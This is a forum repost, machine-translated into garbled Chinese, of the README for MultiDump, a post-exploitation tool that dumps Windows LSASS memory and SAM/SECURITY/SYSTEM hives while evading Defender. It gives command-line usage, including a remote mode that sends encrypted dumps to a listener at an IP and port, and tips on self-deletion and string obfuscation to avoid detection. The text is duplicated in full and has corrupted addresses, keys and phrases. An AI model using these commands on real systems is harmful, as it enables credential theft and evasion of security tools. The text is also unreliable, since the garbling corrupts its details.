taibeihacker
Moderator
MultiDump是用C谨慎地倾倒和提取LSASS内存的C编写的后探索工具,而无需触发Defender警报,并用Python编写的处理程序。
博客POST: https://xre.io/POSTS/MULTIDUMP
MultiDump通过procdump.exe或comsvc.dll支持LSASS转储,它提供了两种模式:一个本地模式,该模式在本地加密和存储转储文件,以及将转储发送到处理程序进行解密和分析的远程模式。
| \/| _ _ | | | _(_)__ \ _ _ __ ___ ___ __________
| | \/| | | | | | | | __ | | | | | | | | | '_ _ _ \ | '_ \
| | | | | _ | | | | _ | | | __ | | | _ | | | | | | | | | | | | | _)|
| _ | | _ | \ __,_ | _ | \ __ | __ | ____/\ __,_ | _ | | _ | | _ | .__/
| _ |
USAGE: MULTIDUMP.EXE [-P procdumppath] [-l localdumppath | -r远程HandlerAddr] [ - procdump] [-v]
-p路径保存procdump.exe,使用完整路径。默认为临时目录
-L保存加密的转储文件的路径,使用完整路径。默认为当前目录
-r设置IP
ort连接到远程处理程序
- Procdump将procdump写入磁盘并用它来倾倒lsass
- 致命禁用LSASS倾倒
- 登录SAM,安全和系统蜂箱
- 延迟增加与网络速度较慢的连接之间的间隔
-v启用v erbose模式
使用comsvcs.dll在本地模式下默认值,并将加密的转储保存在当前目录中。
示例:
MULTIDUMP.EXE -L C: \ USERS \ public \ lsass.dmp -V
MultiDump.exe -procdump -P C: \ Tools \ procdump.exe -r 192.168.1.1.1.1.100:5000用法: MultiDumphandler.py.py.py [-h] [-r远程]
用于远程流行的处理程序
Options:
-h, - 赫尔普显示此帮助消息和退出
-r遥控器- 远程遥控器
接收远程转储文件的端口
-l本地- 本地本地
本地转储文件,解密需要的密钥
- 萨姆马云惹不起马云萨姆本地山姆保存,解密需要的钥匙
- 安全安全本地安全保存,解密所需的密钥
- 系统系统本地系统保存,解密所需的密钥
-k键, - 重新加密本地文件的键键
- Override-IP override_ip
需要手动在远程模式下指定密钥生成的IP地址,用于代理连接,如所有相关工具,管理员/Sedebugprivilege特权。
处理程序取决于pypykatz来解析LSASS转储,然后iMppacket解析注册表保存。它们应该安装在您的环境中。如果看到错误所有检测方法失败,则可能是Pypykatz版本已过时。
默认情况下,MultiDump使用comsvc.dll方法,并将加密的转储保存在当前目录中。
Multidump.exe
.
选择的本地模式。将加密的转储文件写入磁盘.
C: \ Users \ Maltest \ Desktop \ Dciqjp.dat写入磁盘。
key: 91EA54633CD31CC23EB3089928E9CD5AF396D35EE8F738D8BDF2180801EE0CB1B1B1BAE8F0CC4C C3EA7E9CE0A74876EFE87E2C053EFA80EE1111C4C4C4E7C640C0E33E./procdumphandler.py -f dciqjp.dat -k 91EA54633CD31CC23EB3089928E9CD5AF396D35EE8F738D8BDF2180801BAE0CBAE8F0CC4CC4CC3E7E9CE0A7E7E7E774876EFE876EFE87E2C0553EFA80EEEEFAIFA80EE EEE2C64EEF334EEF4EE11C4E.11C4E.11C4ER.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4 - 使用Procdump,procdump.exe将写入磁盘以转储LSASS。
在远程模式下,多翼连接到处理程序的侦听器。
./procdumphandler.py -r 9001
在端口9001上聆听加密密钥. Multidump.exe -R 10.0.0.1:9001键与处理程序的IP和端口加密。当多翼通过代理连接时,处理程序应使用-Override -IP选项在远程模式下手动指定密钥生成的IP地址,从而确保解密通过将解密IP与多次启动-R中的预期IP设置匹配来正确工作。
可以使用-REG可以使用SAM,安全性和系统蜂箱的另一个选项,解密过程与LSASS转储相同。这更多是一项便利功能,可以使邮政利用信息收集更加容易。
可以通过分解以下几行来切换自我删除。H:
#define self_deletion要进一步逃避字符串分析,可以通过在调试中评论以下行,将大多数输出消息排除在编译之外。H:
//#定义Debug MultiDump可能会在Windows 10 22H2(19045)上检测到(某种),我已经对其进行了修复(某种),调查和实现值得一台博客文章本身: https://xre0us.io.io/posts/posts/saving-lsass-from-defender/saving-lsass-from-defender/
博客POST: https://xre.io/POSTS/MULTIDUMP
MultiDump通过procdump.exe或comsvc.dll支持LSASS转储,它提供了两种模式:一个本地模式,该模式在本地加密和存储转储文件,以及将转储发送到处理程序进行解密和分析的远程模式。
Usage
__ _ _ _ _ _ ______| \/| _ _ | | | _(_)__ \ _ _ __ ___ ___ __________
| | \/| | | | | | | | __ | | | | | | | | | '_ _ _ \ | '_ \
| | | | | _ | | | | _ | | | __ | | | _ | | | | | | | | | | | | | _)|
| _ | | _ | \ __,_ | _ | \ __ | __ | ____/\ __,_ | _ | | _ | | _ | .__/
| _ |
USAGE: MULTIDUMP.EXE [-P procdumppath] [-l localdumppath | -r远程HandlerAddr] [ - procdump] [-v]
-p路径保存procdump.exe,使用完整路径。默认为临时目录
-L保存加密的转储文件的路径,使用完整路径。默认为当前目录
-r设置IP
ort连接到远程处理程序- Procdump将procdump写入磁盘并用它来倾倒lsass
- 致命禁用LSASS倾倒
- 登录SAM,安全和系统蜂箱
- 延迟增加与网络速度较慢的连接之间的间隔
-v启用v erbose模式
使用comsvcs.dll在本地模式下默认值,并将加密的转储保存在当前目录中。
示例:
MULTIDUMP.EXE -L C: \ USERS \ public \ lsass.dmp -V
MultiDump.exe -procdump -P C: \ Tools \ procdump.exe -r 192.168.1.1.1.1.100:5000用法: MultiDumphandler.py.py.py [-h] [-r远程]
用于远程流行的处理程序
Options:
-h, - 赫尔普显示此帮助消息和退出
-r遥控器- 远程遥控器
接收远程转储文件的端口
-l本地- 本地本地
本地转储文件,解密需要的密钥
- 萨姆马云惹不起马云萨姆本地山姆保存,解密需要的钥匙
- 安全安全本地安全保存,解密所需的密钥
- 系统系统本地系统保存,解密所需的密钥
-k键, - 重新加密本地文件的键键
- Override-IP override_ip
需要手动在远程模式下指定密钥生成的IP地址,用于代理连接,如所有相关工具,管理员/Sedebugprivilege特权。
处理程序取决于pypykatz来解析LSASS转储,然后iMppacket解析注册表保存。它们应该安装在您的环境中。如果看到错误所有检测方法失败,则可能是Pypykatz版本已过时。
默认情况下,MultiDump使用comsvc.dll方法,并将加密的转储保存在当前目录中。
Multidump.exe
.
选择的本地模式。将加密的转储文件写入磁盘.
C: \ Users \ Maltest \ Desktop \ Dciqjp.dat写入磁盘。
key: 91EA54633CD31CC23EB3089928E9CD5AF396D35EE8F738D8BDF2180801EE0CB1B1B1BAE8F0CC4C C3EA7E9CE0A74876EFE87E2C053EFA80EE1111C4C4C4E7C640C0E33E./procdumphandler.py -f dciqjp.dat -k 91EA54633CD31CC23EB3089928E9CD5AF396D35EE8F738D8BDF2180801BAE0CBAE8F0CC4CC4CC3E7E9CE0A7E7E7E774876EFE876EFE87E2C0553EFA80EEEEFAIFA80EE EEE2C64EEF334EEF4EE11C4E.11C4E.11C4ER.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4.11C4 - 使用Procdump,procdump.exe将写入磁盘以转储LSASS。
在远程模式下,多翼连接到处理程序的侦听器。
./procdumphandler.py -r 9001
在端口9001上聆听加密密钥. Multidump.exe -R 10.0.0.1:9001键与处理程序的IP和端口加密。当多翼通过代理连接时,处理程序应使用-Override -IP选项在远程模式下手动指定密钥生成的IP地址,从而确保解密通过将解密IP与多次启动-R中的预期IP设置匹配来正确工作。
可以使用-REG可以使用SAM,安全性和系统蜂箱的另一个选项,解密过程与LSASS转储相同。这更多是一项便利功能,可以使邮政利用信息收集更加容易。
Building MultiDump
在Visual Studio中打开,以Release模式构建。Customising MultiDump
建议在编译之前自定义二进制文件,例如更改静态字符串或用于对其进行加密的RC4密钥,包括另一个Visual Studio Project Project EncryptionHelper。只需更改键或字符串,并且可以将编译的EncryptionHelper.exe的输出粘贴到Multidipump.c和common.h。可以通过分解以下几行来切换自我删除。H:
#define self_deletion要进一步逃避字符串分析,可以通过在调试中评论以下行,将大多数输出消息排除在编译之外。H:
//#定义Debug MultiDump可能会在Windows 10 22H2(19045)上检测到(某种),我已经对其进行了修复(某种),调查和实现值得一台博客文章本身: https://xre0us.io.io/posts/posts/saving-lsass-from-defender/saving-lsass-from-defender/